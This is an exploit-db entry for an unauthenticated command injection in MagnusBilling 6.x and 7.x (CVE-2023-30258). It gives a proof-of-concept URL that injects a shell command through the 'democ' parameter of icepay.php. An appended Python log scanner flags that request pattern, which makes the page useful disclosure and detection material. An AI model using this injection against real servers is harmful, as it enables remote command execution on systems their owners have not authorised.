[webapps] MagnusSolution magnusbilling 7.3.0 - Command Injection
MagnusBilling versions 6.x and 7.x contain an unauthenticated remote command injection vulnerability (CVE-2023-30258); an attacker can execute system commands by crafting a specific URL. 2025-4-11 00:0:0 Author: www.exploit-db.com

# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7]
# Software Link: [https://github.com/magnussolution/magnusbilling7]
# Version: [7.3.0] 
# Tested on: [CentOS]
# CVE : [CVE-2023-30258]

PoC:
# PoC URL for Command Injection
http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Result: This PoC attempts to inject the id command.

[Replace Your Domain Name]
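
A defensive check for the request pattern shown in the PoC, as an added example that is not part of the original exploit-db entry: it scans web-server access-log lines for requests to icepay.php whose democ parameter decodes to shell metacharacters. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Endpoint and parameter taken from the PoC URL on this page.
VULN_PATH = "/lib/icepay/icepay.php"
VULN_PARAM = "democ"
# Characters a shell treats as separators, substitution or redirection.
SHELL_META = re.compile(r"[;|&`$()<>\r\n]")
# Request field of a combined-format access-log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')

def suspicious_democ(log_line):
    """Return the decoded democ value if it carries shell metacharacters, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote_plus(target.path).endswith(VULN_PATH):
        return None
    # Split on '&' by hand so a raw ';' stays inside the parameter value.
    for pair in target.query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name) == VULN_PARAM:
            value = unquote_plus(raw)
            if SHELL_META.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_democ(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Oct/2024:10:00:01 +0000] "GET /lib/icepay/icepay.php'
    '?democ=testfile%3B%20id%20%3E%20/tmp/injected.txt HTTP/1.1" 200 0',
    '203.0.113.7 - - [26/Oct/2024:10:00:05 +0000] "GET /lib/icepay/icepay.php'
    '?democ=testfile HTTP/1.1" 200 0',
    '198.51.100.4 - - [26/Oct/2024:10:01:00 +0000] "GET /index.php?q=a%3Bb HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: democ={value!r}")
```

The check flags both URL-encoded and raw forms of the parameter, and ignores metacharacters in requests to other paths.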
            

Source: https://www.exploit-db.com/exploits/52170